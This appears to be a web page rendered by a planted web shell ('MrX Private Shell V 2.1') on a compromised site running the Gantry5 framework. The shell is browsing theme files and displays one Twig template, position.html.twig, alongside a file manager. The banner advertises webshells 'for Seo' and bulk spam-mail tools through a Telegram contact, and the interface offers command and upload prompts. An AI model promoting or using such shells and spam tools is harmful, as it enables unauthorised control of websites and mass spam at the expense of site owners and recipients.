__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<div id="position-{{ position.name }}" class="page">
    <h4>
        <span data-g-config-href="{{ gantry.route('positions', position.name, 'rename') }}"
              data-g-config-method="post"
              data-title-editable="{{ position.title }}"
              class="title"
              data-tip="{{ position.title }}"
              data-title-editable-type="title"
        >
            {{ position.title }}
        </span>
        <i class="fa fa-fw fa-pencil fa-pencil-alt font-small" aria-hidden="true" tabindex="0" aria-label="{{ 'GANTRY5_PLATFORM_EDIT_TITLE'|trans(position.title) }}" data-title-edit=""></i>
        <span class="float-right font-small">
            <a href="{{ gantry.route('positions', position.name, 'add') }}" class="button button-primary button-simple position-add"
                    title="{{ 'GANTRY5_PLATFORM_POSITION_ADD'|trans }}"
                    aria-label="{{ 'GANTRY5_PLATFORM_POSITION_ADD'|trans }}"
            >
                <i class="fa fa-fw fa-plus" aria-hidden="true"></i>
            </a>
        </span>
        <span class="font-small position-key">
            <span data-g-config-href="{{ gantry.route('positions', position.name, 'rename') }}"
                  data-g-config-method="post"
                  data-title-editable="{{ position.name }}"
                  data-tip="{{ position.name }}"
                  data-title-editable-type="key"
                >
                {{ position.name }}
            </span>
            <i class="fa fa-fw fa-pencil fa-pencil-alt font-small" aria-hidden="true" tabindex="0" aria-label="{{ 'GANTRY5_PLATFORM_EDIT_TITLE'|trans(position.title) }}" data-title-edit=""></i>
        </span>
    </h4>
    <div class="position-container inner-params" data-g5-position="{{ position.toJson(true)|e('html_attr') }}" data-g5-position-name="{{ position.name }}">
        <ul>{% spaceless %}
            {% for module in position %}
                {% include 'pages/positions/item.html.twig' with { module: module } %}
            {% endfor %}
        {% endspaceless %}</ul>
    </div>
    <div class="inner-params">
        <div class="center position-actions">
            <button data-tip="{{ 'GANTRY5_PLATFORM_DUPLICATE'|trans }}"
                    aria-label="{{ 'GANTRY5_PLATFORM_DUPLICATE_X'|trans(position.title) }}"
                    title="{{ 'GANTRY5_PLATFORM_DUPLICATE'|trans(position.title) }}"
                    data-g-config="duplicate"
                    data-g-config-href="{{ gantry.route('positions', position.name, 'duplicate') }}"
                    data-g-config-method="POST"
                    class="button button-secondary"
            >
                <i class="fa fa-fw fa-copy" aria-hidden="true"></i>
            </button>
            <button data-tip="{{ 'GANTRY5_PLATFORM_DELETE'|trans }}"
                    title="{{ 'GANTRY5_PLATFORM_DELETE_X'|trans(position.title) }}"
                    aria-label="{{ 'GANTRY5_PLATFORM_DELETE'|trans(position.title) }}"
                    data-g-config="delete"
                    data-g-config-href="{{ gantry.route('positions', position.name, 'delete') }}"
                    data-g-config-method="POST"
                    class="button red"
            >
                <i class="far fa-fw fa-trash-alt" aria-hidden="true"></i>
            </button>
        </div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
css-warnings.html.twig File 297 B 0664
outline.html.twig File 3.37 KB 0664
picker.html.twig File 455 B 0664
position.html.twig File 3.3 KB 0664
switcher.html.twig File 4.61 KB 0664
Filemanager